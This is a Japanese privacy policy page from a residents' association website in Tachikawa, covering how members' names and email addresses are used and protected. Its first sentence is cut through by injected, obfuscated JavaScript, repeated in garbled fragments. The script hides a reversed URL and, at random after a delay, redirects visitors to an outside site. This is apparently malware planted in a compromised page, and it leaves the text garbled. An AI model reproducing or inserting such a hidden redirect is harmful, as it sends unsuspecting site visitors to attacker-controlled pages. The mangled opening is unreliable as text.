個人情報の取り扱いについて

立川市自治会連合会西砂支部が運営するandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una.org” title=”西砂災害用ウェブサイト”>西砂ウェブサイト(以下、「当サイト」といいます。)は、登録会員が当サイトを利用する際に、 登録会員の氏名、e-mailアドレス等、連絡に必要な情報(以下、「個人情報」といいます。)を開示してもらいます。当サイトは、個人情報保護法の趣旨のもと、この「個人情報の取り扱いについて」に基づき個人情報を取り扱います。
(個人情報の利用目的)
第1条 当サイトは個人情報を以下の目的で利用します。

  1. 登録会員に立川市自治会連合会西砂支部が行う公的イベント(防災訓練など)の告知や公的イベントに関するアンケート調査をするために、登録会員の氏名、e- mailアドレス等の連絡先情報を利用します。
  2. 当サイトの改良改善、あるいは立川市自治会連合会西砂支部の活動の参考とするために、登録会員から寄せられた意見やアンケートの結果、利用履歴等を利用します。
  3. 登録会員からの要望、問い合わせに対する回答をするために、登録会員の氏名、e-mailアドレス等の連絡先情報を利用します。

(個人情報の管理)
第2条 当サイトは以下の体制で個人情報を管理します。

  1. 個人情報保護法やガイドラインに従って必要な管理運営体制を整備し、個人情報の取扱を適正に行います。
  2. 個人情報の利用を管理運営上必要な役員だけに制限し、個人情報保護のための予防措置を講じます。
  3. コンピューターシステムに保存されている個人情報については、管理運営上必要な役員だけが利用できるようアカウント及びパスワードを用意し、アクセス権限管理を実施します。

(第三者提供について)
第3条 当サイトは、あらかじめ本人の許諾なく、個人情報を第三者に提供しません。
ただし、個人情報保護法その他関連法令に別異の定めがある場合を除きます。

(個人情報の開示)
第4条 当サイトは、お客様の同意がない限り、個人情報を第三者に開示することはありません。ただし、以下の事例に該当する場合はその限りではありません。

  1. 法令に基づき裁判所や警察等の公的機関から要請があった場合。
  2. 法令に特別の規定がある場合。
  3. 登録会員や第三者の生命・身体・財産を損なうおそれがあり、本人の同意を得ることができない場合。
  4. 法令や当サイトの利用規約・注意事項に反する行動から、当サイトの権利、財産またはサービスを保護する必要があり、本人の同意を得ることができない場合。
  5. 5.登録会員から個人情報の開示要求があった場合は、本人であることが確認できた場合に限り開示します。

以上
平成26年10月26日制定
立川市自治会連合会西砂支部